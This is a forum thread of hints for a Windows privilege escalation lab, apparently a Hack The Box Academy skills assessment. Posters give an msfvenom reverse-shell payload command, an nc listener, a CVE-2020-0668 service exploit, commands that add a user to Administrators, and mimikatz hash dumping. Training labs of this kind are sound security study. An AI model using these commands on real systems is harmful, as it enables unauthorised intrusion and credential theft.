Windows Privilege Escalation Skills Assessment - Part II

Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop. Trying for a long time. Tried many exploits, nothing seems to work.
Any hint?

Ok, so just read this if you are really really trapped and since nobody was replying.

To get privilege escalation there is a section that explains how to use CVE-2020-0668.
Since I was not able to “build” the “.exe” file from the source, what I just did was download the .exe files provided in the section machine that explains that CVE onto my Linux machine, re-spawn the Skill Assessment Part II machine and pass the .exe files. You can easily do this by sharing the “/tmp” folder from our attacker machine with the Windows target machine network using

xfreerdp /v:<target-ip> /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:linux,/tmp

so you have a “shared” folder between our Linux attacker machine and Windows target machine.

You can follow the steps as the Academy teaches.
However, when you try to get Meterpreter reverse shell, at least for me, I got the following error when I use commands:
[-] Error running command getuid: Rex::TimeoutError Send timed out

So, for this reason, instead of generating a malicious binary that uses Meterpreter, just do it the old-fashioned way and create a simple .exe reverse shell with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp lhost=<your attacker ip> lport=<your listening port> -f exe > ma****.exe
and, before starting the “infected” service, just remember to run nc:
nc -lvnp <listening port>

To get the system network user password (which could be used in other circumstances for pivoting), you have two options:

  • Use mimikatz.exe
  • Using our privileged reverse shell, add our user to Administrators group (“net localgroup Administrators htb-student /add”), use (do NOT use ‘just-dc’ flags) and crack the hashes with your favorite tool

Happy hacking


Oh sorry guys, I already finished the assessment II while above. The above text is a hint that others asked me for before.

the steps given to accomplish the task given by @GunZF0x are fair enough and precise… please if you can further elaborate the issue you are facing

Yes, follow these steps and get the executable from the previous module, it will make your life easier. Also msfconsole has a module but it doesn't work for some reason in this lab, so don't waste time with it :slight_smile:

Just my 2 cents on this exercise:

Thanks so much! This has saved me a good chunk of time… It feels like they’ve added these skill assessments to mess with us and get us thinking outside the box. It’s a bit much sometimes

The first question to find the cleartext password for the iamtheadministrator account was the hardest for me.

There is good advice in here on how to do it. WinPEAS or SharpUp.exe will get you to where you need to go.

But it won’t put it right in your face. You may need to look in something.

Anyway, this was a good lab and a great example of why you shouldn’t just leave passwords *cough* unattended *cough* :wink: